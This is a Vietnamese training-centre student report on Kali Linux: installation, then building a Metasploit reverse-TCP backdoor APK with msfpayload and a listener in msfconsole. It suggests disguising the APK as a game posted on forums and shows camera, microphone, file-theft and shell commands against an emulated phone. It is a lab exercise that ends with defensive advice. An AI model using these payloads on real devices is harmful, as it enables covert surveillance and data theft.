Bao cao athena 2

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG

VÀ AN NINH MẠNG QUỐC TẾ ATHENA

BÁO CÁO TUẦN

ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE

CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH

CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ

DỤNG ANDROID VÀ GỬI RA NGOÀI

CBHD: Võ Đỗ Thắng

SVTH: Nguyễn Đức Thái

Tp. HCM Ngày 29 Tháng 06 Năm 2014

Mục Lục

Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android. ........................ 1

1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy

Android .................................................................................................................................................. 1

1.1. Tổng quan .............................................................................................................................. 1

1.2. Cải tiến của Kali Linux so với Backtrack. .......................................................................... 1

1.3. Cài đặt Kali Linux ................................................................................................................. 2

1.3.1. Chuẩn bị. ........................................................................................................................ 2

1.3.2. Cài đặt. ........................................................................................................................... 2

1.4. Tạo mã độc trên Kali Linux để xâm nhập Android. ........................................................ 15

CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI

Trang 1

Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công

vào Android.

1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux

để xâm nhập vào máy Android

1.1. Tổng quan

Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để

kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux

là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng

sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã

công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản

BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà

bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.

1.2. Cải tiến của Kali Linux so với Backtrack.

Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu

trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có

được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập

nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan

trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói

của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu

trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem

xét hoặc thay đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến

trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta

có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính

là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay

USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá

mạng không dây.

Khả năng tùy biến cao


Trang 2

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối

với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như

GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều

hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta

đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3).

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ

dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không

phải cài lại mới hoàn toàn nữa

1.3. Cài đặt Kali Linux

1.3.1. Chuẩn bị.

File iso Kali Linux: http://www.kali.org/downloads/

Máy có cài sẵn Vmware.

1.3.2. Cài đặt.

Đầu tiên ta cần download Kali Linux tại link sau http://www.kali.org/downloads/.

Chọn phiên bản phù hợp tiến hành download. Ở đây chọn phiên bản dành cho

windowns 32 bit download bằng link trực tiếp. Sau khi có file iso ta tiến hành cài đặt

Kali Linux trên máy ảo.

Khởi động VMwarre, ở góc phải trên màn hình chọn File -> New Virtual

Machine....

http://www.kali.org/downloads/

http://www.kali.org/downloads/


Trang 3

Hinh 12. Chon phương thức cái đặt.

Chọn Typical, nhấn Next để tiếp tục.

Hinh 33. Tim đường dẫn đến file iso Kali Linux.

Chọn Installer disc image file, nhấn Browse… tìm đường dẫn đến file iso của

Kali Linux sau đó nhấn Next để tiếp tục.


Trang 4

Hinh 34. Chọn dung lượng đĩa.

Thiết đặt dung lượng tối đa dùng để cài đặt Kali Linux sau đó chọn Next.

Hinh 35. Xác nhận cài Đặt.

Chọn Finish để xác nhận tiến hành cài đặt.


Trang 5

Hinh 36. Cài đặt Kali Linux.

Tại đây ta chọn Graphical install => Enter để tiến hành cài đặt trực quan bằng

giao diện.

Hinh 37. Chọn Ngôn Ngữ.

Tiến hành chọn lựa ngôn ngữ (ở đây chọn English), nhấn continue.


Trang 6

Hinh 38. Chọn khu vực.

Lựa chọn khu vực ta chọn other => Continue.

Hinh 39. Khu vực Asia.

Tiếp tục chọn khu vực là Asia => Continue.


Trang 7

Hinh 20. Chọn quốc gia Viet Nam.

Chọn quốc gia là Viet Nam => Continue.

Hinh 41. Chọn bảng mã.

Chọn bảng mã là United States – en_US.UTF. Bảng mã này gồm đầy đủ các ký

tự Latinh đồng thời hỗ trợ Tiếng Việt. Nhấn Continue để tiếp tục.


Trang 8

Hinh 42. Chọn kiểu bàn phím.

Chọn kiểu bàn phím Ameican English => Continue.

Hinh 43. Đặt Hostname.

Tiếp theo là thiết đặt mạng. Đặt tên Hostname là bắt buộc. Ta có thể đặt tên bất kỳ

nhưng không thể có khoảng trắng. Nhấn Continue để tiếp tục.


Trang 9

Hinh 44. Đặt Domain name.

Có thể bỏ trống Domain name => Continue.

Hinh 43. Đặt root password.

Điền hai lần Root password giống nhau (nhớ password đã đặt để sau này đăng

nhập) => Continue.


Trang 10

Hinh 44. Tùy chọn ổ đĩa.

Tùy chọn ổ đĩa cài đặt. Ở đây ta chọn use entire disk -> continue.

Hinh 45. Chọn ổ đĩa cài đặt.

Tiếp tục nhấn Continue.


Trang 11

Hinh 46. Phương thức cài đặt ổ đĩa.

Chọn All file in one partion => Continue.

Hinh 47. Xác nhận thông số cài đặt.

Kiểm tra thiết đặt thông tin ổ đĩa. Nếu có sai sót chọn Go Back để sửa đổi. Chọn

Continue tiếp tục.


Trang 12

Hinh 50. Xác nhận định dạng ổ đĩa.

Chọn Yes để xác nhận thay đổi ổ đĩa => Continue để tiến trình bắt đầu copy file

và cài đặt Kali Linux.

Hinh 51. Cài đặt bắt đầu.


Trang 13

Hinh 52. Tìm kiếm cập nhật qua internet.

Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng.

Ta chọn No để nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong).

Hinh 53. Xác nhận cài đặt GRUD.


Trang 14

Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta

chọn Yes => Continue.

Hinh 54. Xác nhận cài đặt thành công.

Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ

thực hiện xoa một số file dư thừa sau khi cài đặt rồi khởi động lại.


Trang 15

Hinh 55. Đăng nhập Kali Linux.

Sau khi khởi động xong ta nhập User là root va password được đặt ở trên để đăng

nhập. Như vậy là ta đã hoàn thành cài đặt xong Kali Linux.

1.4. Tạo mã độc trên Kali Linux để xâm nhập Android.

Trước khi tiến hành ta nên thiết lập phần Network như sau:

Vào VM => Settings... ở thanh lựa chọn của Vmware


Trang 16

Vào Network Adapter và chọn Bridged: connection directly to the physical

network

Vào Edit => Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn adapter

của máy thật


Trang 17

Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu

tiên ta cần tạo 1 file apk có chứa backdoor bằng cách:

Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.


Trang 18

Sử dụng lệnh msfpayload android/meterpreter/reverse_tcp

lhost=192.168.240.132 lport=4444 R > /root/Desktop/App.apk để tạo backdoor. Với

192.168.240.132 là ip đã tìm được ở trên.

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một

Metasploit reverse tcp backdoor.


Trang 19

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng

cách gõ lệnh sau:

use exploit/multi/handler

set payload /meterpreter/reverse_tcp

set lhost 192.168.240.132 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set port 4444 – nhập port giống với port khi tạo payload ở trên.

exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk

đến các máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va

tiến hành chia sẻ trên forum. Ở đây thử với một máy Galaxy Nexus One giả lập, tải về

App.apk, cài đặt:


Trang 20

Khởi động ứng dụng vậy là ta đã kết nối thành công tới máy Android này, ở

msfconsole sẽ như sau:

Để xem tất cả các lệnh hỗ trợ nhập help


Trang 21

Để xem thông tin về máy, nhập lệnh SysInfo

Xem thông tin card mạng nhập lệnh ipconfig:

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở

danh sách camera ở phần trước. Ví dụ như sau:


Trang 22

File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root

của máy

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Ta được file ghi âm

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục


Trang 23

Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download

App.apk

Và file này sẽ được tải về thư mục root của máy Kali

Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để

xem các file và quyền hạn cần để sử dụng.


Trang 24

Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng.

Mà các dữ liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được

lưu tại đây. Vi thế ta chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm

nhập đã được root (hack chiếm quyền điều khiển cao nhất).

Kết luận

Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách

sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy

Android về máy.

Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ

trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, không tiến

hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta đã có

thể xem như có toàn quyền kiểm soát máy Android đó.

Education

Bao cao athena 2